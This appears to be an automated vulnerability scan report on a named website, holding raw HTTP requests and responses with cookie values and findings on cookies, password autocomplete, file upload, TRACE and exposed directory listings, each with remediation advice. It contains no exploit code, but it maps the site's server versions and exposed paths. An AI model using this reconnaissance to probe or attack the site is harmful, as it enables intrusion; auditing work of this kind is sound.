<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/feeds/34-gaac-blogs/17-viget-labs-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:01:42 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:01:43 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:01:43 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23971
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/feeds/34-gaac-blogs/41-webshare-design.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:40:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:40:36 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:40:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18831
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/feeds/34-gaac-blogs/9-epik-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:33:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:33:54 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:33:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28644
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/healthcheck/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:27:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:27:07 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:27:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27942
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /urchin/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:25:05 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:25:06 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:25:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /urchin/buy.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:27:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:27:53 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:27:53 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29184
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /urchin/urchin-6.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:14:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:14:51 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:14:51 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21631
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /urchin/urchin-hosting.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:13:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:13:52 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:13:52 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25623
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xmlrpc/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/robots.txt Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:59:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Vary: Accept-Charset Set-Cookie: 7876d45a49f537da76cfb9e129203eee=a1fc6ae5202cedb8577231d32f7e4055; path=/ Content-Length: 303 Connection: close Content-Type: text/xml
<?xml version="1.0"?> <methodResponse> <fault> <value> <struct><member><name>faultCode</name> <value><int>103</int></value> </member> <member> <name>faultString</name> <value><string>XML error: no ele ...[SNIP]...
8. Password field with autocomplete enabledpreviousnext There are 2 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.
Issue background
File upload functionality is commonly associated with a number of vulnerabilities, including:
File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service
You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.
Some factors to consider when evaluating the security impact of this functionality include:
Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.
Issue remediation
File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:
Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.
The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.
Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.
Issue remediation
The TRACE method should be disabled on the web server.
Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.
Issue remediation
There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:
Configure your web server to prevent directory listings for all paths beneath the web root;
Place into each directory a default file (such as index.htm) which the web server will display instead of returning a directory listing.
GET /components/com_chronocontact/css/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:52:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 1016 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /components/com_chronocontact/css</title> </head> <body> <h1>Index of /components/com_chronocontact/css</h1>
GET /components/com_chronocontact/css/images/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:52:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 590 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /components/com_chronocontact/css/images</title> </head> <body> <h1>Index of /components/com_chronocontact/cs ...[SNIP]... <li><a href="/components/com_chronocontact/css/"> Parent Directory</a> ...[SNIP]...
GET /components/com_chronocontact/css/img/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/components/com_chronocontact/css/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:53:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 630 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /components/com_chronocontact/css/img</title> </head> <body> <h1>Index of /components/com_chronocontact/css/i ...[SNIP]... <li><a href="/components/com_chronocontact/css/"> Parent Directory</a> ...[SNIP]...
GET /components/com_chronocontact/js/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:53:47 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 788 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /components/com_chronocontact/js</title> </head> <body> <h1>Index of /components/com_chronocontact/js</h1> <u ...[SNIP]... <li><a href="/components/com_chronocontact/"> Parent Directory</a> ...[SNIP]...
GET /components/com_chronocontact/themes/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:50:37 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 524 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /components/com_chronocontact/themes</title> </head> <body> <h1>Index of /components/com_chronocontact/themes ...[SNIP]... <li><a href="/components/com_chronocontact/"> Parent Directory</a> ...[SNIP]...
GET /components/com_chronocontact/themes/default/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:48:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 697 Connection: close Content-Type: text/html;charset=ISO-8859-1
